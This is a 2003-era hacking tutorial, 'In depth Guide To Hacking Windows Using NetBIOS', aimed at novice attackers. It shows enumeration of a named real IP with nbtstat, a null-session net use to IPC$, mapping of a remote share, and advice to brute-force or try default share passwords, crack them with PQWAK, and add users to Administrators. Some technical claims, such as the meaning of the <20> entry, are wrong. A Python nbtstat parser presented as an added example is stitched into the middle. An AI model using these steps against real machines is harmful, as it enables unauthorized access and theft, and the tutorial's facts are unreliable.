
In depth Guide To Hacking Windows Using NetBIOS

By: C0ldPhaTe

Introduction:
It has been brought to my attention that many people don't understand the way NetBIOS works. Many don't even know where to begin when it comes to hacking NetBIOS. So in this tutorial I'm going to cover the basics of hacking NetBIOS. I will also remind you that hacking with NetBIOS is almost the easiest way to hack remotely. Although it might be one of the easiest ways to hack remotely, you will find that hacking with NetBIOS has a lot of powerful uses as well.

The Network Basic Input Output System (NetBIOS):

The Network Basic Input Output System is also known as NetBIOS. NetBIOS was originally developed by IBM, which used Sytek as an Application Programming Interface (API) for client software operating systems. These systems included Windows 98, Windows Me and Windows NT.

The Network Neighborhood:

Many of you have seen the icon labeled "Network Neighborhood", but a lot of upcoming hackers, also known as newbies, might not know exactly how to use the Network Neighborhood or understand how it works. The Network Neighborhood is used to access the computers attached to your network. After you have clicked on the Network Neighborhood icon, your computer tries to get the names of all the computers attached to your network. It does this by issuing a command known as NetBIOS. The NetBIOS command is used to give various information on computers connected to a network. But before you can move on to any of this you will first have to start from the basics, which I have included below. From there you can then attack your target.

Information Gathering And Server Penetration:

The first step you would take while looking for a target victim is to portscan the target machines or network. One thing to keep in mind when you're hacking a Windows NT system or network is that NetBIOS tends to be the target of the brute force attack. The reason for this is that information gathering with NetBIOS is fairly easy to do. The thing to remember is that if the port scanner reports that your target machine or network has port 139 open, you can simply query that system using a few simple commands, which I will go into a little later in this tutorial.

What Is the NBTSTAT Command:

The NBTSTAT command is a very powerful command which allows you to manually interact with NetBIOS. To use this command you will first have to launch the MS-DOS Command Prompt. For those of you who don't know how to launch it: click the Start button, slide your mouse over Run, type Command in the Run prompt, and it will automatically launch the MS-DOS Prompt.

The NBTSTAT Command Options:

The display below is what you would get if you went into the MS-DOS Prompt and typed c:\windows\nbtstat /?. It gives you a basic breakdown of what you will be able to do with the NBTSTAT command. I know it's a little hard to read the table below without any real knowledge of what it means, so I'm actually going to walk you through a real hack so you can get a little understanding of how you would go about using the information you gather. OK, now onto the more fun and useful information.

Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).
NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] [interval]

NBTSTAT -a (adapter status) Lists the remote machine's name table given its name
NBTSTAT -A (Adapter status) Lists the remote machine's name table given its IP address.
NBTSTAT -c (cache) Lists the remote name cache including the IP addresses
NBTSTAT -n (names) Lists local NetBIOS names.
NBTSTAT -r (resolved) Lists names resolved by broadcast and via WINS
NBTSTAT -R (Reload) Purges and reloads the remote cache name table
NBTSTAT -S (Sessions) Lists sessions table with the destination IP addresses
NBTSTAT -s (sessions) Lists sessions table converting destination IP addresses to host names.

RemoteName - Remote host machine name.
IP address - Dotted decimal representation of the IP address.
Interval - Redisplays selected statistics, pausing interval seconds between each display.

The column headings which are generated by using the NBTSTAT command have the following meanings:

Input – Number of bytes received.
Output – Number of bytes sent.
In/Out – Whether the connection is outbound (from your computer to the target) or inbound (from another system to your local machine).
Life – The remaining time that a name table cache entry will, so to speak, live.
Local Name – The local NetBIOS name given to your connection.
Remote Host – The name or Internet Protocol (IP) address of the remote host.

Actually Using The NBTSTAT Command:

OK, now I will begin to show you how to use the NBTSTAT command. This is an example; later on in the tutorial I will give you a step by step breakdown of everything from gathering the target information to actually hacking in using the NBTSTAT command. Now remember, this is an actual machine which has port 139 open and allows File Sharing; the domain is known as Http://www.intrixsoftware.com. Now I will begin the process of making my way into the system.

Example On How To Use the NBTSTAT Command:

C:\WINDOWS>NBTSTAT -a 66.94.35.10

       NetBIOS Remote Machine Name Table

   Name               Type         Status
-----------------------------------------------
SETI2            <00>  UNIQUE      Registered
WORKGROUP        <00>  GROUP       Registered
SETI2            <20>  UNIQUE      Registered
INet~Services    <1C>  GROUP       Registered
SETI2            <03>  UNIQUE      Registered
WORKGROUP        <1E>  GROUP       Registered
IS~SETI2.......  <00>  UNIQUE      Registered
WORKGROUP        <1D>  UNIQUE      Registered

MAC Address = 00-10-DC-5F-F2-E6

Important Note: If you don't get a readout with the number <20> showing, this means that the target victim has File and Print Sharing enabled. Another thing you might get is "Host Not Found"; this shows that either port 139 is closed or that the Internet Protocol (IP) address doesn't exist.

Now from the information we have gathered with the NBTSTAT command you can proceed either to continue hacking or to use the other information for things such as connection hijacking, MAC spoofing etc. This information is rather important while continuing on in your hack, but before you can do anything else you are going to need to know a little about what you just read, so below I have broken down the NetBIOS Remote Machine Name Table.

Breakdown Of The NetBIOS Remote Machine Name Table:

Before you can go any further you will need to know a little about how to read the NetBIOS Remote Machine Name Table. Understanding the list below is key to gaining access to a target machine running

Name                  Number   Type     Usage
------------------------------------------------------------------
<computername>        00       Unique   Workstation Service
<computername>        01       Unique   Messenger Service
<\\_MSBROWSE_>        01       Group    Master Browser
<computername>        03       Unique   Messenger Service
<computername>        06       Unique   RAS Server Service
<computername>        1F       Unique   NetDDE Service
<computername>        20       Unique   File Server Service
<computername>        21       Unique   RAS Client Service
<computername>        22       Unique   Exchange Interchange
<computername>        23       Unique   Exchange Store
<computername>        24       Unique   Exchange Directory
<computername>        30       Unique   Modem Sharing Server Service
<computername>        31       Unique   Modem Sharing Client Service
<computername>        43       Unique   SMS Client Remote Control
<computername>        44       Unique   SMS Admin Remote Control
<computername>        45       Unique   SMS Client Remote Chat
<computername>        46       Unique   SMS Client Remote Transfer
<computername>        4C       Unique   DEC Pathworks TCPIP Service
<computername>        52       Unique   DEC Pathworks TCPIP Service
<computername>        87       Unique   Exchange MTA
<computername>        6A       Unique   Exchange IMC
<computername>        BE       Unique   Network Monitor Agent
<computername>        BF       Unique   Network Monitor Applications
<username>            03       Unique   Messenger Service
<domain>              00       Group    Domain Name
<domain>              1B       Unique   Domain Master Browser
<domain>              1C       Group    Domain Controllers
<domain>              1D       Unique   Master Browser
<domain>              1E       Group    Browser Service Elections
<Inet~Services>       1C       Group    Internet Information Server
<IS~Computer_name>    00       Unique   Internet Information Server
<computername>        2B       Unique   Lotus Notes Server
------------------------------------------------------------------

Now that you have seen the complete NetBIOS Remote Machine Name Table in full, I will tell you how to actually go about reading the table and understanding exactly what it says. Below you are going to find a complete listing and definitions for each entry, so please keep this table and listing handy because it will play a big part in your hacker journeys.

NetBIOS Remote Machine Name Table Definitions:

Unique – Anything with the type Unique may only have one Internet Protocol (IP) address assigned to it.
Group – A normal group; this allows a single name to exist with many IP addresses.
Domain Name – New in Microsoft Windows NT 4.0.
Internet Group – A special configuration of the group names.
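As an added example (not part of the original tutorial), the Python below reads saved nbtstat -A output and decodes each entry with the suffix table above, so an administrator can see at a glance what a host on their own network is advertising (hostname, workgroup, File Server Service, IIS, domain controller) without reading the table by hand. The regular expressions and the SUFFIX_USAGE dictionary are my own construction from the breakdown; the sample input is an excerpt of the tutorial's own output for 66.94.35.10.

```python
import re
# Suffix meanings from the name table breakdown above, keyed by (suffix, type).
SUFFIX_USAGE = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain Name",
    ("03", "UNIQUE"): "Messenger Service",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("20", "UNIQUE"): "File Server Service",
}
IIS = "Internet Information Server"  # INet~Services / IS~<name> special names
# A table row is name, <suffix>, UNIQUE|GROUP, status; header lines never match.
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-F]{2})>\s+(UNIQUE|GROUP)\s+\S+", re.I)
MAC_RE = re.compile(r"MAC Address\s*=\s*((?:[0-9A-F]{2}-){5}[0-9A-F]{2})", re.I)

def parse_name_table(text):
    # Returns ([(name, suffix, type, usage), ...], mac) from nbtstat -A text.
    rows, mac = [], None
    for line in text.splitlines():
        if m := ROW_RE.match(line):
            name, suffix, ntype = m.group(1), m.group(2).upper(), m.group(3).upper()
            if name == "INet~Services" or name.startswith("IS~"):
                usage = IIS
            else:
                usage = SUFFIX_USAGE.get((suffix, ntype), "unknown")
            rows.append((name, suffix, ntype, usage))
        mm = MAC_RE.search(line)
        mac = mm.group(1).upper() if mm else mac
    return rows, mac

def summarize(text):
    # The facts the tutorial reads off the table by hand, as one dict.
    rows, mac = parse_name_table(text)
    s = {"hostname": None, "workgroup": None, "mac": mac,
         "file_sharing": False, "iis": False, "domain_controller": False}
    for name, suffix, ntype, usage in rows:
        if usage == "Workstation Service":
            s["hostname"] = s["hostname"] or name
        elif usage == "Domain Name":
            s["workgroup"] = s["workgroup"] or name
        s["file_sharing"] |= usage == "File Server Service"
        s["iis"] |= usage == IIS
        s["domain_controller"] |= usage == "Domain Controllers"
    return s

# Excerpt of the tutorial's own nbtstat output for 66.94.35.10, as sample input.
SAMPLE = """\
SETI2            <00>  UNIQUE      Registered
WORKGROUP        <00>  GROUP       Registered
SETI2            <20>  UNIQUE      Registered
INet~Services    <1C>  GROUP       Registered
MAC Address = 00-10-DC-5F-F2-E6
"""
```

Running summarize(SAMPLE) reports hostname SETI2 in workgroup WORKGROUP with the File Server Service and IIS names registered, which is exactly what the tutorial reads off the table above.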

Now what you do with the received output is up to you, but most hackers would glean possible usernames from the remote machine or machines. This now leads me on to another thing known as the NET command.

Using NetBIOS Shares:

After you have found a NetBIOS share you will then proceed to add it to your LMHOSTS file. After you add it to your LMHOSTS file you will be able to view the remote computer within your Network Neighborhood; if you don't add it, you will not be able to view the computer remotely. After adding it to your LMHOSTS file you can simply use the Find Computer option within Windows NT and Windows 95/98 to browse the shares. Alternatively, you can use the very powerful NET.exe:

C:\>net view 66.94.35.10

C:\>net view \\SETI2

Shared Resources At 66.94.35.10

Share Name   Type   Used As   Comment
------------------------------------------------
NETLOGON     DISK             Logon Server Share
SETI2        DISK
TEST         DISK

Note: You will often find that shares like C$, ADMIN$ and IPC$ are hidden and will most of the time not be shown. Below is a listing of shares you might come across and should be familiar with. A lot of the time you will find that these shares are indeed password protected, so you might have to try a brute force attack on the password, or you might get lucky and find that the password is a default password which was shipped with the machine. If you're asking yourself how I know the default passwords, search the web for "Default NetBIOS passwords" and you should be rather pleased with your outcome.

Below is a listing of shares and their uses:

Share Name   Type   Comment
----------------------------------
ADMIN$       DISK   Remote Admin
C$           DISK   Default Share
IPC$         IPC    Remote IPC
NETLOGON     DISK   Logon Server Share
Test         DISK

I will now connect to the IPC$ share on 66.94.35.10 using a Null Session.

C:\>net use \\66.94.35.10\ipc$ "" /user:""

The command completed successfully.

I will now connect to a normal share using the net use command, which then gives me remote access to the share through the drive letter I specify in the command.

C:\>net use x: \\66.94.35.10\test

The command completed successfully.

C:\>net use
New connections will be remembered.

Status   Local   Remote              Network
---------------------------------------------------------------
OK       X:      \\66.94.35.10       Microsoft Windows Network
OK       B:      \\ a 66.94.35.10    Microsoft Windows Network
The command completed successfully.

I mentioned above the NET.exe and how powerful it actually is; well, I will now tell you some interesting and very useful things to know while you're hacking into a machine. Understanding these commands and how they work will make the process of gaining administrative rights a whole lot easier.

What NET.exe Is Good For:

Below you will find out just what NET.exe can be used for. I have included a listing of things it is capable of and a definition of what each command does.

NET name – Shows the current name of the computer and who is currently logged in.
NET accounts – Shows the password restrictions for users.
NET share – Displays all shares on the local machine.
NET user – Shows the accounts created on the local machine.
NET group – Can be used to add people to the Administrators group.

How To Crack Share Passwords:

You might remember me saying above about finding shares that are password protected on your target machine. For cracking share passwords on Windows 95, 98, Me and XP you can use a password cracker known as "PQWAK", which can be found on any web page that deals with password crackers. PQWAK usually recovers a share password within a minute or so. The only bad thing is that PQWAK can only crack the share passwords of the same operating system it is running on.

Conclusion:
Well, I hope you have learned a little bit about hacking with NetBIOS. Although hacking NetBIOS is one of the easiest ways to hack into a system, it is also a very powerful way to take over a system. I would also recommend downloading some text files or buying some books on Windows NT, Windows 2000 or hacking web servers. Remember, it's always smarter to read information before acting. The more knowledgeable you are about your target operating system, the less likely you are to make a false move which will get your ass caught. I'm not claiming to be "l33t", as most people would consider themselves. You will see a lot of people say they are, but you will find very few who really are. Also, don't be ashamed if you go into a channel and someone makes fun of you for asking a question. We have all gone through it; just don't get discouraged, blow them off and continue to read up on anything you can get your hands on. If you have any questions you can find me on mIRC or you can contact me through the information provided below. Also be sure to download my other tutorials.

mIRC: irc.dal.net #h4ckerz, #crystalz, #hackalot, #Hackfest, #Hack-i, #Hacku, #minangcrew, #Hack0r, #hack.exe, #localhost
E-Mail: gbrooks@mcintoshstudent.com
AOL IM: Myst1kal One

Other Documents I Have Written:

In depth Guide To Hacking Windows Using NetBIOS – February 7, 2003
A Complete User's Guide To Port Scanning – February 06, 2003
A Quick Unix Command Guide – January 30, 2003
A Definitive Trojan Port Listing – January 30, 2003
Basics On How To Identify A Firewall – January 23, 2003
The Common Gateway Interface (CGI) – November 28, 2002
Microsoft IIS Unicode Exploit Explained – November 13, 2002
